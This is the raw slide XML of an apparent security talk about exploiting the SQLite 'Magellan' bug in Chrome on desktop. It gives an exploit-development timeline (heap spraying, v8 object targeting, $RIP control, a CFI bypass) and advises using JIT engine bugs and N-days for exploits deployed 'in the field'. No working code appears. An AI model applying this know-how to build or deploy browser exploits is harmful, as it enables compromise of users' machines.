        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1530220" y="3685589"/>
            <a:ext cx="802433" cy="1315617"/>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251010" y="3705220"/>
            <a:ext cx="1754930" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>New exploit strategy for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>TCMalloc</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2965191" y="1633545"/>
            <a:ext cx="1259632" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Write POC in python</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2995117" y="5018908"/>
            <a:ext cx="1886729" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Python is hanging when creating payload to spray 2GB. Throw POC away. Rewrite in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2332653" y="2279876"/>
            <a:ext cx="1268963" cy="1405713"/>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3601616" y="2279876"/>
            <a:ext cx="634482" cy="277635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V="1">
            <a:off x="4236098" y="4112851"/>
            <a:ext cx="653143" cy="916341"/>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229877" y="3428812"/>
            <a:ext cx="1327279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Try to target v8 objects</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4893517" y="4112467"/>
            <a:ext cx="663639" cy="1308616"/>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040470" y="5472681"/>
            <a:ext cx="1327279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Realizes it’s impossible</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5557156" y="2982732"/>
            <a:ext cx="861527" cy="2438352"/>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43331" y="2348444"/>
            <a:ext cx="1327279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Slowly write exploit until Stage 10</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Straight Connector 41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418683" y="2982732"/>
            <a:ext cx="602215" cy="2923546"/>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6386408" y="5960389"/>
            <a:ext cx="2328381" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Can’t advance further with current strategy. Go back to stage 6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7030229" y="2416629"/>
            <a:ext cx="527567" cy="349898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6885216" y="1497099"/>
            <a:ext cx="1569098" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>New strategy. Progressed to Stage 10</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="Straight Connector 48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7557796" y="2448422"/>
            <a:ext cx="541175" cy="2273436"/>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817113" y="4732875"/>
            <a:ext cx="1327279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The Unicode problem</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Straight Connector 51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8098189" y="3428812"/>
            <a:ext cx="528349" cy="1285402"/>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8548404" y="3438142"/>
            <a:ext cx="875337" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Found new AAR</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="Straight Connector 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8626538" y="2448422"/>
            <a:ext cx="685413" cy="98039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8779323" y="1780027"/>
            <a:ext cx="1569098" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Controlled $RIP !!!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Straight Connector 58"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9321282" y="2435689"/>
            <a:ext cx="681914" cy="3220516"/>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9316223" y="5740182"/>
            <a:ext cx="1502615" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Encountered Chrome’s CFI</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63" name="Straight Connector 62"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10003196" y="4297517"/>
            <a:ext cx="1072241" cy="1358688"/>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11112057" y="4084473"/>
            <a:ext cx="1067007" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Bypassed CFI</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="66" name="Straight Connector 65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="11075437" y="1884784"/>
            <a:ext cx="466530" cy="2412733"/>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10921872" y="1229919"/>
            <a:ext cx="1291902" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Exploit Complete!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17414" name="Picture 6" descr="Jackie cha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608137" y="10412973"/>
            <a:ext cx="76122" cy="48312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17418" name="Picture 10" descr="Wow"/>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063914" y="4085039"/>
            <a:ext cx="438087" cy="44171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Jackie chan"/>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9255" y="6119013"/>
            <a:ext cx="777321" cy="4933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ainbow puke"/>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5731" y="-5499644"/>
            <a:ext cx="59907" cy="4571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y u n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51745" y="5349377"/>
            <a:ext cx="551332" cy="55690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9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4517406" y="2342637"/>
            <a:ext cx="833391" cy="576963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8425929" y="6233952"/>
            <a:ext cx="615037" cy="556267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="cat gasp"/>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736351" y="5053831"/>
            <a:ext cx="732161" cy="46544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8" descr="yay"/>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029627" y="1287860"/>
            <a:ext cx="600299" cy="582815"/>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Scroll scroll"/>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241179" y="1407754"/>
            <a:ext cx="632762" cy="627244"/>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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10670736" y="5902534"/>
            <a:ext cx="799466" cy="522318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336418" y="6119011"/>
            <a:ext cx="619765" cy="663837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1044" name="Picture 20" descr="Duck yeah"/>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11397892" y="4792468"/>
            <a:ext cx="536489" cy="556909"/>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kitteh smile"/>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55283" y="4322678"/>
            <a:ext cx="474488" cy="469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113529"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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But really…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4733795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>This was just to demonstrate that the Magellan bug is actually exploitable in desktop platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>A more elaborate walkthrough can be found on the blog post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>For the purpose of deploying an exploit in the field, try finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(or utilizing, for N-Days)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> bugs in the JIT engine!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>JIT engine bugs : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Speed, Reliability, Portability, Imperceptibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (+ Very little Heap gymnastics required. Makes exploit even more reliable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3982435963"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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Special Thanks</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="11125201" cy="4733795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Everyone in Exodus Intelligence for being awesome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Tencent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Blade team for the cool bug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>My wife for supporting me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>smealum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> for the amazing research and inspiration for the slide design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Sean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Heelan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> for the pictures in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>tcmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> presentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="877947532"/>
      </p:ext>
    </p:extLst>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Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4" descr="mario question block ext:gifì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1" noCro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920331" y="1825625"/>
            <a:ext cx="4351338"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699282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Fts3 Variable Length Integer Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620484" y="3371468"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000111</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4234541" y="3371468"/>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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000100</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848598" y="3367031"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
